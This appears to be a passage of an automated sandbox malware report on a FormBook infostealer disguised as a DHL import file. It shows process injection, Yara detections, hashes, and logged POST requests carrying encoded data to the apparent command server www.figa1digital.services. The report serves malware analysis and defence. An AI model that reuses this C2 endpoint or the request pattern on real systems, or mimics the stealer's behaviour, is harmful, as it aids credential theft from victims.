Nov 5, 2024 07:14:00.219053030 CET	636	IN	Data Raw: 61 6c 2e 73 65 72 76 69 63 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 63 Data Ascii: al.services" target="_blank" rel="noopener noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-
Nov 5, 2024 07:14:00.219069004 CET	1236	IN	Data Raw: 67 2d 31 2e 33 20 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d 67 72 65 65 6e 2d 73 75 63 63 65 73 73 22 3e 57 6f 72 6b 69 6e 67 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 68 6f 73 74 2d 73 74 61 74 75 73 22 Data Ascii: g-1.3 text-2xl text-green-success">Working</span></div><div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden flo
Nov 5, 2024 07:14:00.219088078 CET	1236	IN	Data Raw: 20 73 65 72 76 65 72 2e 20 41 73 20 61 20 72 65 73 75 6c 74 2c 20 74 68 65 20 77 65 62 20 70 61 67 65 20 63 61 6e 20 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: server. As a result, the web page can not be displayed.</p> </div> <div class="w-1/2 md:w-full float-left leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</
Nov 5, 2024 07:14:00.219105005 CET	1236	IN	Data Raw: 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b Data Ascii: t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ddab37a5eeb287b</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <sp
Nov 5, 2024 07:14:00.219121933 CET	114	IN	Data Raw: 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 64 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 2d 2d 3e 0a 0a 0a 20 20 Data Ascii: entListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50037	188.114.97.3	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:14:02.066782951 CET	752	OUT	POST /r2pg/ HTTP/1.1 Host: www.figa1digital.services Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.figa1digital.services Referer: http://www.figa1digital.services/r2pg/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6d 32 35 45 54 76 54 49 65 48 79 41 64 55 59 73 6b 4e 46 56 62 2b 56 54 2b 50 72 63 6b 34 70 54 36 79 34 54 6e 54 41 62 39 55 45 2b 63 4c 50 4b 39 33 67 39 58 63 55 69 33 6b 46 31 42 59 63 55 6e 53 68 34 4a 2f 34 4e 5a 7a 73 51 65 56 34 62 78 6f 48 38 66 70 59 43 4d 69 44 52 6c 52 6a 53 55 50 58 47 50 31 66 48 46 77 64 49 4e 55 78 7a 55 42 6b 38 4f 6d 6a 62 63 76 6d 4c 66 73 67 44 36 70 72 53 65 31 53 48 64 72 59 44 34 30 44 34 45 75 48 52 52 4d 71 33 75 69 42 45 33 4c 42 63 72 36 4c 54 36 78 37 6f 30 56 78 4b 6d 64 79 4d 4f 57 4c 71 68 54 51 79 67 41 35 5a 78 52 4e 69 44 6b 39 57 68 79 4d 4f 39 73 30 42 47 43 35 46 78 4e 58 69 38 4e 77 3d Data Ascii: FLL4t=m25ETvTIeHyAdUYskNFVb+VT+Prck4pT6y4TnTAb9UE+cLPK93g9XcUi3kF1BYcUnSh4J/4NZzsQeV4bxoH8fpYCMiDRlRjSUPXGP1fHFwdINUxzUBk8OmjbcvmLfsgD6prSe1SHdrYD40D4EuHRRMq3uiBE3LBcr6LT6x7o0VxKmdyMOWLqhTQygA5ZxRNiDk9WhyMO9s0BGC5FxNXi8Nw=
Nov 5, 2024 07:14:02.740293980 CET	1236	IN	HTTP/1.1 520 Date: Tue, 05 Nov 2024 06:14:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 7243 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P3mlckGu6cKPPr6WhLK3%2F0bedHDg%2B97ehQjqUyTQ%2FZH0bYIrU8KQh60W4TopRV0ECt3gfH249tjI%2F4qSVGqHla9g%2F2Eqg%2FHA%2BkG%2FZIEYpdnfLmSfdXao4gRjAQzgefnKmj5D%2FwE0IrsBbJCB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ddab38a3ee53ac5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1121&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> <
Nov 5, 2024 07:14:02.740345001 CET	1236	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 66 69 67 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 20 7c 20 35 32 30 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 72 65 74 Data Ascii: !--<![endif]--><head><title>www.figa1digital.services \| 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible"
Nov 5, 2024 07:14:02.740395069 CET	1236	IN	Data Raw: 20 20 20 3c 2f 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 79 2d 38 20 62 67 2d 67 72 61 64 69 65 6e 74 2d 67 72 61 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 Data Ascii: </header> <div class="my-8 bg-gradient-gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:
Nov 5, 2024 07:14:02.740428925 CET	1236	IN	Data Raw: 77 77 77 2e 66 69 67 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c Data Ascii: www.figa1digital.services" target="_blank" rel="noopener noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0
Nov 5, 2024 07:14:02.740464926 CET	848	IN	Data Raw: 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 3c 2f 73 70 61 6e 3e 0a 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 6d 64 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 74 2d 33 20 6d 64 3a 6d 74 2d 30 20 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d Data Ascii: a1digital.services</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div>
Nov 5, 2024 07:14:02.740499020 CET	1236	IN	Data Raw: 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 6c 65 61 64 69 6e 67 2d 31 2e 33 20 6d 62 2d 34 22 3e 57 68 61 74 20 63 61 6e 20 49 20 64 6f 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 20 63 6c 61 Data Ascii: ont-normal leading-1.3 mb-4">What can I do?</h2> <h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15
Nov 5, 2024 07:14:02.740535975 CET	1152	IN	Data Raw: 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 Data Ascii: er-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50038	188.114.97.3	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:14:04.620795012 CET	10834	OUT	POST /r2pg/ HTTP/1.1 Host: www.figa1digital.services Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.figa1digital.services Referer: http://www.figa1digital.services/r2pg/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6d 32 35 45 54 76 54 49 65 48 79 41 64 55 59 73 6b 4e 46 56 62 2b 56 54 2b 50 72 63 6b 34 70 54 36 79 34 54 6e 54 41 62 39 55 4d 2b 63 35 58 4b 76 45 49 39 57 63 55 69 70 55 46 32 42 59 64 4f 6e 53 35 38 4a 2f 30 33 5a 78 6b 51 64 32 77 62 6b 70 48 38 51 70 59 43 52 53 44 55 34 68 6a 48 55 50 48 43 50 31 50 48 46 77 64 49 4e 53 39 7a 44 45 45 38 49 6d 6a 59 62 76 6d 48 62 73 67 72 36 70 79 6e 65 31 58 36 63 61 34 44 34 55 54 34 4a 34 72 52 64 4d 71 31 39 53 42 6d 33 4c 39 54 72 36 48 66 36 78 50 57 30 53 42 4b 6b 6f 72 68 62 56 6e 79 36 69 6f 77 79 77 35 4a 33 68 77 6c 4d 56 6c 59 75 53 45 58 68 4d 6f 4c 4d 52 55 6f 6b 59 53 6f 34 4a 5a 66 67 53 45 7a 2b 46 64 6f 55 31 72 39 32 68 71 71 37 54 64 42 4d 44 49 4a 4a 6d 44 6a 4c 76 44 76 2b 77 6d 41 74 76 4a 34 75 69 41 76 4e 43 76 34 37 46 53 76 6f 45 56 41 77 33 49 64 6d 6a 4b 6c 63 47 77 78 4c 6b 58 69 78 7a 66 6c 35 7a 38 2f 61 34 50 37 2f 55 65 49 69 33 58 6a 63 50 72 33 6a 35 33 37 71 67 6c 4d 30 6e 49 54 66 64 41 63 4b 37 6b 68 [TRUNCATED] Data Ascii: FLL4t=m25ETvTIeHyAdUYskNFVb+VT+Prck4pT6y4TnTAb9UM+c5XKvEI9WcUipUF2BYdOnS58J/03ZxkQd2wbkpH8QpYCRSDU4hjHUPHCP1PHFwdINS9zDEE8ImjYbvmHbsgr6pyne1X6ca4D4UT4J4rRdMq19SBm3L9Tr6Hf6xPW0SBKkorhbVny6iowyw5J3hwlMVlYuSEXhMoLMRUokYSo4JZfgSEz+FdoU1r92hqq7TdBMDIJJmDjLvDv+wmAtvJ4uiAvNCv47FSvoEVAw3IdmjKlcGwxLkXixzfl5z8/a4P7/UeIi3XjcPr3j537qglM0nITfdAcK7kh58ClfFFEYfsCvE9Yx9F+pOHQJ3SWKBIpK3mxBhoXjZBJh5kLKJJMdWWANJFWeqO5i+1MOpuKvd7vLWqCjLLOKZ2Tn6wkQBERU3m+g+8rmWlwc5rLbpnTgLQNJi6hiOw2Dxz8uAEuOw2gUCxe0QCv1J7+4itaWZMujR9K1FbAM6+TAQ2ryfiCsnhB5M/Vg5qFqEi9b56+OAvvz/yz2b6jMHwvNP3XREWALtaJUGrXzHY76Kg6x0LXfNCwyCwv5X8WowOApZExfTgf23KearWNZAYCpQISCIyGZI+208cvlyc27NVArlPzUZFUpeBFqsUUcx50+tHpGeweWvdGM66xhevvX17n0U9daDLHyAJRGLau3IUzFHhPzwGSUUSCkZimtJCgvPYKODg2ToGkzDXp66cFXlUulWomg7RIDXqVgW6bQVA8qLFPawm4LdgjhN9zT+uZ8HrN3hiGlzBbvQ5BA3qTM8k/fDLCC2qATh56FxAkGwzeUqaiIlaO0DNCqT5sk3Sei3WvhwILtWoa5s5V5xbEIF6l49fInKLUk9UWTrAHtn10pVFgWJhCHPfb9gtlw3lT4mAC8mwnujM6M6nD0SgzA3RfZjrUg6tUMvAOEwUReJ7exnW6e4Xw3/DkmSLAE5LbYGUQZw/bbjLq2Hd5xnHXGb+r91Yhh0 [TRUNCATED]
Nov 5, 2024 07:14:05.301202059 CET	1236	IN	HTTP/1.1 520 Date: Tue, 05 Nov 2024 06:14:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 7243 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qQw%2B%2FEjgS3rpmuxv6OAUOW7fNaQeH9eeOlgJLN5Gcnbds9RxqrX9jgKwuWB0RxCQ06d4qyzmDuUlwsAa0TBB5nAnKDztrjTCFZ15vCt9kEOJZ5NriyDcj6cpdVksv8czfGbes5r4nEZh6t%2Fu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ddab39a39bae863-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1288&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![end
Nov 5, 2024 07:14:05.301222086 CET	1236	IN	Data Raw: 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 66 69 67 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 20 7c 20 35 32 30 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e Data Ascii: if]--><head><title>www.figa1digital.services \| 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content=
Nov 5, 2024 07:14:05.301232100 CET	1236	IN	Data Raw: 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 79 2d 38 20 62 67 2d 67 72 61 64 69 65 6e 74 2d 67 72 61 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 Data Ascii: er> <div class="my-8 bg-gradient-gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py
Nov 5, 2024 07:14:05.301244020 CET	1236	IN	Data Raw: 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 Data Ascii: digital.services" target="_blank" rel="noopener noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bo
Nov 5, 2024 07:14:05.301254988 CET	848	IN	Data Raw: 2e 73 65 72 76 69 63 65 73 3c 2f 73 70 61 6e 3e 0a 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 6d 64 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 74 2d 33 20 6d 64 3a 6d 74 2d 30 20 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d 67 72 61 79 2d 36 30 30 20 Data Ascii: .services</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div> <
Nov 5, 2024 07:14:05.301270962 CET	1236	IN	Data Raw: 6c 20 6c 65 61 64 69 6e 67 2d 31 2e 33 20 6d 62 2d 34 22 3e 57 68 61 74 20 63 61 6e 20 49 20 64 6f 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 74 65 78 74 2d Data Ascii: l leading-1.3 mb-4">What can I do?</h2> <h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-sem
Nov 5, 2024 07:14:05.301284075 CET	1143	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 Data Ascii: tor sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <s

Target ID:	0
Start time:	01:10:59
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
Imagebase:	0x4e0000
File size:	1'607'168 bytes
MD5 hash:	9711BD672D1A08A3EE97BC0B7AFCBAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:11:00
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
Imagebase:	0x5e0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1897339030.0000000003920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1897068289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1897614409.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:11:16
Start date:	05/11/2024
Path:	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe"
Imagebase:	0x7f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3506566104.0000000002500000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	01:11:17
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\wusa.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\wusa.exe"
Imagebase:	0x970000
File size:	325'120 bytes
MD5 hash:	EB96F0F207F203DD0B6D8A2625270495
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:11:18
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\net.exe"
Imagebase:	0xe40000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3505463052.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3506460086.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3506551312.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	01:11:33
Start date:	05/11/2024
Path:	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe"
Imagebase:	0x7f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3508272257.0000000004BE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:11:45
Start date:	05/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	5.8%
Total number of Nodes:	1524
Total number of Limit Nodes:	31

Executed Functions

Function 004E42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 004E430D

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

